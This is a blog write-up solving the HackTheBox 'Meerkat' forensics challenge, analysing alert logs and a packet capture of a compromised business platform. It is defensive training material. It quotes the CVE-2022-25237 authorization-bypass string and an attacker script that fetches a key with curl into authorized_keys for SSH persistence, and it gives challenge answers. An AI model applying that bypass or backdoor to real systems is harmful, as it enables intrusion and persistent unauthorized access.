HTB Sherlock: Meerkat

HTB Sherlock: Meerkat

PCAP analysis - clean and easy to follow forensics challenge


4 min read

This write-up is a part of the HTB Sherlocks series. Sherlocks are investigative challenges that test defensive security skills. I encourage you to try them out if you like digital forensics, incident response, post-breach analysis and malware analysis. Are you ready to start the investigation?

Incident Details

Name: Meerkat(Retired)
Category: SOC
Difficulty: Easy (Solved)

As a fast growing startup, Forela have been utilising a business management platform. Unfortunately our documentation is scarce and our administrators aren't the most security aware. As our new security provider we'd like you to take a look at some PCAP and log data we have exported to confirm if we have (or have not) been compromised.


01: ZIP archive, password protected (hacktheblue)


02: JSON file


03: pcapng capture file



In this scenario we have 10 questions to answer.

  1. We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?
$ cat meerkat-alerts.json | jq .[].alert.signature | sort | uniq > alerts.sorted.unique

I'm assuming the application in question is the mentioned Business Management Platform. There are couple lines containing same name (blurred):

  1. We believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out?

Browsing the logs I can see the multiple alerts for "Default User Login Attempt" and "python-requests".

Answer: Credential Stuffing

  1. Does the vulnerability exploited have a CVE assigned - and if so, which one?

Clear in the logs.

Answer: CVE-2022-25237

  1. Which string was appended to the API URL path to bypass the authorization filter by the attacker's exploit?

CVE-2022-25237 exploit is performed by appending ;i18ntranslation or /../i18ntranslation/ to the end of a URL, so I'm opening meerkat.pcap in Wireshark. Alerts indicate that Credential Stuffing was performed from to Then I just looked in the requests to identify which of two strings was used.

Answer: ;i18ntranslation

  1. How many combinations of usernames and passwords were used in the credential stuffing attack?

Now let's use commandline TShark to filter and format output so that we have easier way to answer

$ tshark -r meerkat.pcap -2 -R "http.request.full_uri contains loginservice" -T fields -e "tcp.segment_data" | sort | uniq |  xxd -p -r

Pass meerkat.pcap file to tshark, filter packets by only those where request URI contains loginservice, show only single field - tcp.segment_data (that holds POST body), then sort those values and output unique values to xxd tool that will output in ASCII format.

Unfortunately I was not able to break the lines after xdd so I've done that in the text editor. There are 57 unique combinations, one of which (username=install&password=install) is not a part of credential stuffing.

Answer: 56

  1. Which username and password combination was successful?

Search in Wireshark for the response that sets "JSESSIONID" cookie, then follow the HTTP stream. See what credentials were used.

  1. If any, which text sharing site did the attacker utilise?

This time I was lucky becasue the answer was in the previous screen/filter.


Bonus: contents of the reqested URLs are still active and contains scripts that adds SSH key to the authorized_keys collection and restarts SSH daemon.

  1. Please provide the filename of the public key used by the attacker to gain persistence on our host.

From the Bonus section of the last question - content of the first script:

curl >> /home/ubuntu/.ssh/authorized_keys
sudo service ssh restart

Answer: hffgra4unv

  1. Can you confirmed the file modified by the attacker to gain persistence?

Again, answer in the above script

Answer: /home/ubuntu/.ssh/authorized_keys

  1. Can you confirm the MITRE technique ID of this type of persistence mechanism?

Navigate to MITRE ATT&CKยฎ -> Persistence -> SSH Authorized Keys.

Answer: T1098.004

Data Recovery

None required.

Lessons Learned

  • jq for easier querying JSON data

  • tshark for filtering and parsing PCAP files

Additional readings

Did you find this article valuable?

Support Kamil Gierach-Pacanek by becoming a sponsor. Any amount is appreciated!